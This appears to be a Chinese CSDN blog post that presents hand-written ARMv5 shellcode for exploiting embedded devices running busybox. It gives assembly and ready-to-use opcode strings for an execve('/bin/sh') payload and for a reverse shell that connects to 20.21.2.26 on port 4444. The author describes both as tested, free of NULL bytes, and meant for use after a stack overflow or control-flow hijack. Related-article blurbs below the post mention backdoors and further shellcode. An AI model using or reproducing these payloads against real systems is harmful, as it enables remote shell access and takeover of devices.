Armv5_shellcode

已于 2022-04-27 17:14:56 修改
阅读量2.8k 收藏
点赞数
分类专栏: 学习 文章标签: 安全
于 2022-04-14 19:16:58 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_37433000/article/details/124179332
版权

Armv5_shellcode

背景:

​ 由于在pwntools生成的shellcode默认Armv7语法无法在Armv5指令集芯片下执行,所以写了以下shellcode便于漏洞的利用,此shellcode为Armv5上亲测可使用且无NULL byte,此shellcode主要是对栈进行了操作,未对代码段与数据段进行修改。

适用场景:

​ 1.目标适用busybox

​ 2.有栈溢出或者其他可以劫持程序流程漏洞

​ 3.内存中布置好此段shellcode,且能执行

适用busybox
/*
#execve("/bin/sh",["/bin/sh"],NULL)
#Date:2022-4-14
#Author:doudoudedi
#Text:F1C200s
*/
.section .text
.global _start

_start:
	.ARM
	eor r4,r4,r4
	strb r4,[sp,#-14]
	mov r7,#0x68
	strb r7,[sp,#-0x15]
	mov r7,#0x73
	strb r7,[sp,#-0x16]
	mov r7,#0x2f
	strb r7,[sp,#-0x17]
	mov r7,#0x6e
	strb r7,[sp,#-0x18]
	mov r7,#0x69
	strb r7,[sp,#-0x19]
	mov r7,#0x62
	strb r7,[sp,#-0x1a]
	mov r7,#0x2f
	strb r7,[sp,#-0x1b]
	add r4,sp,#-0x1b
	add r3,pc,#1
	bx  r3
	.THUMB
	mov r0,r4
	push {r0,r1}
	mov r1,sp
	mov r2,#1
	sub r2,r2,#1
	mov r7,#0xb
	svc #1
/*
opcode
"\x04\x40\x24\xe0\x0e\x40\x4d\xe5\x68\x70\xa0\xe3\x15\x70\x4d\xe5\x73\x70\xa0\xe3\x16\x70\x4d\xe5\x2f\x70\xa0\xe3\x17\x70\x4d\xe5\x6e\x70\xa0\xe3\x18\x70\x4d\xe5\x69\x70\xa0\xe3\x19\x70\x4d\xe5\x62\x70\xa0\xe3\x1a\x70\x4d\xe5\x2f\x70\xa0\xe3\x1b\x70\x4d\xe5\x1b\x40\x4d\xe2\x01\x30\x8f\xe2\x13\xff\x2f\xe1\x20\x1c\x03\xb4\x69\x46\x01\x22\x01\x3a\x0b\x27\x01\xdf\xc0\x46"
*/
Reverse Shell TCP(Armv5)

Armv5反弹shell,注意第二个参数需要时/bin/sh地址的指针数组,且数组第二个为空或者有效地址。

/*
#reverse_ip=20.21.2.26,port=4444
#Date:2022-4-15
#Author:doudoudedi
#Text:F1C200s

.section .text
.global _start

_start:
	.ARM
	eor r4,r4,r4
	mov r7,#0x14
	strb r7,[sp,#-0x28]
	mov r7,#0x15
	strb r7,[sp,#-0x27]
	mov r7,#0x2
	strb r7,[sp,#-0x26]
	mov r7,#0x1a
	strb r7,[sp,#-0x25]
	mov r7,#2
	strb r7,[sp,#-0x2c]
	strb r4,[sp,#-0x2b]
	mov r7,#0x11
	strb r7,[sp,#-0x2a]
	mov r7,#0x5c
	strb r7,[sp,#-0x29]
	strb r4,[sp,#-0x14]
	mov r7,#0x68
	strb r7,[sp,#-0x15]
	mov r7,#0x73
	strb r7,[sp,#-0x16]
	mov r7,#0x2f
	strb r7,[sp,#-0x17]
	mov r7,#0x6e
	strb r7,[sp,#-0x18]
	mov r7,#0x69
	strb r7,[sp,#-0x19]
	mov r7,#0x62
	strb r7,[sp,#-0x1a]
	mov r7,#0x2f
	strb r7,[sp,#-0x1b]
	add r4,sp,#-0x1b
	add r5,sp,#-0x2c
	add r3,pc,#1
	bx  r3
	.THUMB
	mov r0,#2
	mov r1,#1
	eor r2,r2,r2
	mov r7,#200
	add r7,r7,#81
	svc #1
	mov r6,r0
	mov r1,r5
	mov r2,#0x10
	add r7,r7,#2
	svc #1
	mov r0,r6
	eor r1,r1,r1
	mov r7,#63
	svc #1
	mov r0,r6
	add r1,r1,#1
	svc #1
	mov r0,r6
	add r1,r1,#1
	svc #1
	mov r0,r4
	eor r1,r1,r1
	eor r2,r2,r2
	push {r0,r1}
	mov r1,sp
	mov r7,#0xb
	svc #1
opcode:
shellcode="\x04\x40\x24\xe0\x14\x70\xa0\xe3\x28\x70\x4d\xe5\x15\x70\xa0\xe3\x27\x70\x4d\xe5\x02\x70\xa0\xe3\x26\x70\x4d\xe5\x1a\x70\xa0\xe3\x25\x70\x4d\xe5\x02\x70\xa0\xe3\x2c\x70\x4d\xe5\x2b\x40\x4d\xe5\x11\x70\xa0\xe3\x2a\x70\x4d\xe5\x5c\x70\xa0\xe3\x29\x70\x4d\xe5\x14\x40\x4d\xe5\x68\x70\xa0\xe3\x15\x70\x4d\xe5\x73\x70\xa0\xe3\x16\x70\x4d\xe5\x2f\x70\xa0\xe3\x17\x70\x4d\xe5\x6e\x70\xa0\xe3\x18\x70\x4d\xe5\x69\x70\xa0\xe3\x19\x70\x4d\xe5\x62\x70\xa0\xe3\x1a\x70\x4d\xe5\x2f\x70\xa0\xe3\x1b\x70\x4d\xe5\x1b\x40\x4d\xe2\x2c\x50\x4d\xe2\x01\x30\x8f\xe2\x13\xff\x2f\xe1\x02\x20\x01\x21\x52\x40\xc8\x27\x51\x37\x01\xdf\x06\x1c\x29\x1c\x10\x22\x02\x37\x01\xdf\x30\x1c\x49\x40\x3f\x27\x01\xdf\x30\x1c\x01\x31\x01\xdf\x30\x1c\x01\x31\x01\xdf\x20\x1c\x49\x40\x52\x40\x03\xb4\x69\x46\x0b\x27\x01\xdf"
*/

以上脚本都可以优化欢迎优化

doudoudedi
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
kali修改文件权限不够_Linux下的权限维持
weixin_39956036的博客
10-21 2104
Linux权限维持0X00 关于权限维持什么是权限维持?我们可以直接简单的把权限维持理解为我们在目标上安装了一个后门,权限维持的目的是保证自己的权限不会掉,一直控制住目标.0X01 获得初始权限Linux有很多种反弹shell的方法,反弹shell的好处主要是操作过程中会更加方便,对我个人来说,主要是命令补全,总之,从权限维持的角度来说,可以更好的去执行一些操作.能否反弹shell,要根...
取自开源,分享于开源 —— 利用CVE-2017-8890漏洞ROOT天猫魔屏A1
god
05-12 3929
本来对阿里的东西挺有好感的,没想到这么一个东西就一个开机广告问题把我的好感败光了。 入手的时候根本没有什么开机广告,使用三个月之后一次系统更新就出现了开机广告。感情升级就是生个开机广告?果断投诉。 可是又如何呢?最多只是把我提到的“开机广告音量大,吓死人,还不可调节音量”修改了,开机广告还是存在。 就算是入手四五个月还是比较新的,直接拆了,然后扔一边,搬家的时候就当垃圾扔了。 什么阿里! 突然翻到之前的记录,躺着也是躺着,就分享下。 ...
ARMv5体系结构参考手册官方原版
04-15
ARM Architecture Reference Manual ,ARMv5体系结构参考手册官方原版,网上所有的手册几乎都是PDF版的,这一个是DOC版的,方便编辑,打印。
asga:用于 ARM 目标的字母数字 Shellcode 生成器
06-18
asga(用于 ARM 目标的字母数字 Shellcode 生成器) 基于 Rix 的“Writing ia32 alphanumeric shellcodes”、来自 BerendJanWever 的“Alpha3”的循环解码思想,以及 Yves Younan 等人的 Phrack 文章“Alphanumeric RISC ARM Shellcode” ##Build: cd [project_root]/src 制作 二进制“arm_alnum”将在 [project_root]/src/ 中创建“arm_alnum”可以移动到任何选择的目录。 ##用法: [Directory_of_arm_alnum]/arm_alnum 程序要求提供包含输入 shellcode 的文件和文件类型(目前仅支持 C 和二进制)。 二进制输入文件应该只包含 shellcode。 AC 输入文件
shellcodes:ARM & x86 shellcode
06-30
外壳代码 ARM & x86 shellcode 由 signalsec 编写
ARM(手机、嵌入式)架构上ShellCode编写入门教程
msInfoSec的博客
12-14 1146
ShellCode编写起来其实很简单。
arm shellcode 编写详析1
随心散人专栏
11-26 1264
在编写arm shell code 之前,先介绍下arm中r0-r15寄存器的主要用途:Register Alt. Name Usage r0 a1 First function argument Integer function result Scratch register r1 a2 S
From Zero to ARM Assembly Bind Shellcode
04-18
14. ARM架构和核心系列:ARM处理器有不同的核心系列,如ARMv6、ARMv7等,各自有不同的功能和用途,了解这些差异有助于针对特定的硬件环境编写Shellcode。 通过上述知识点的学习,我们可以更好地理解ARM汇编和...
信息安全_数据安全_EL3 Tour:Get The Ultimate Privil.pdf
08-22
EL3,即特权级3(Exception Level 3),是ARMv8架构中的最高特权级别,负责管理操作系统和其他低级别特权模式的执行。在华为P20(搭载Hisilicon Kirin 970芯片)这样的Android手机中,EL3扮演着核心安全角色,它不仅...
ARM 汇编语言入门
墨鱼菜鸡
07-11 1521
[翻译]二进制漏洞利用(二)ARM32位汇编下的TCP Bind shell:https://bbs.pediy.com/thread-253511.htm ARM汇编语言入门 From:ARM汇编语言入门(一):https://zhuanlan.zhihu.com/p/109057983 原文地址:https://azeria-labs.com/...
shellcode2assembly:ARCH:ARMARM64,MIPS,PPC,X86
03-02
ShellcodeToAssembly 用您的shellcode替换shellcodetoasm.py。 {Endian类型是little endian。 } shellcode = ' ' 安装 git clone https://github.com/blacknbunny/ShellcodeToAssembly.git && cd ShellcodeToAssembly/ && pip2 install -r requirements.txt && python2 shellcodetoasm.py 模块手动安装 pip install -r requirements.txt可以是pip2 install -r requirements.txt 用法 python2 shellcodetoasm.py [returnbit] [architecture] [assembly-fl
v5 new code
06-20
release for v5, you can download and enjoy it.
vex599BDriveCode:以VexCode V5文本编写的驱动器代码
02-23
vex599BDriveCode 在2019-2020 VEX季节(塔式收购)中以VexCode V5文本编写的驱动代码。 不再更新。 要使用,只需下载最新的zip文件并将其导出到文件夹中即可。 使用VEXcode V5文本应用程序打开V5CODE文件。
arm so注入代码
06-22
arm elf格式so注入,研究elf格式,ARM1136J-S发布于2003年,是针对高性能和高能效的应用而设计的。ARM1136J-S是第一个执行ARMv6架构指令的处理器,它集成了一条具有独立的load-store和算术流水线的8级流水线。ARMv6指令包含了针对媒体处理的单指令多数据流(SIMD)扩展,采用特殊的设计以改善视频处理性能
ARM v5,v6,v7小结
03-16
关于ARM的简介及 v5, v6, v7等版本的分类归纳
arm linux漏洞,Linux/ARM - Bind (/TCP) Shell Shellcode (104 bytes)
weixin_36217616的博客
05-13 175
/**Copyright © 2017 Odzhan. All Rights Reserved.Redistribution and use in source and binary forms, with or withoutmodification, are permitted provided that the following conditions aremet:1. Redistrib...
arm shellcode 编写详析2
随心散人专栏
11-26 743
前一篇中介绍了arm shellcode基本用法,现在涉及到arm和thumb状态 在前一篇中默认为arm32模式: text:00008074 ; Segment type: Pure code .text:00008074 AREA .text, CODE .text:00008074 ; ORG 0x8074 .text
ARM编译器版本问题(手把手教学V5编译器安装)
最新发布
lagrange__的博客
01-30 686
下载新版本的MDK之后就只有最新版的V6编译器,如果需要V5版本的编译器需要自己下载,V5编译器为老版本编译器,下载后选择安装路径,必须在ARM\ARMCLANG路径下。下载V5编译器安装包,之前试过直接用盘里的V5,安装失败。后面发现要用之前已经装过许可证的V5编译器,如果需要安装包可留言。解压到ARM文件夹下,然后添加文件夹路径就可以。
ARMv5架构参考手册:用户指南
"ARMv5用户手册,包含了ARM架构、MMU和指令等相关内容。" 本文档,即"ARMv5参考手册",是ARMLimited公司版权所有,详细介绍了ARM架构的相关知识,适用于ARMv5架构的处理器。手册的版本信息显示,它经过了多次更新,...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值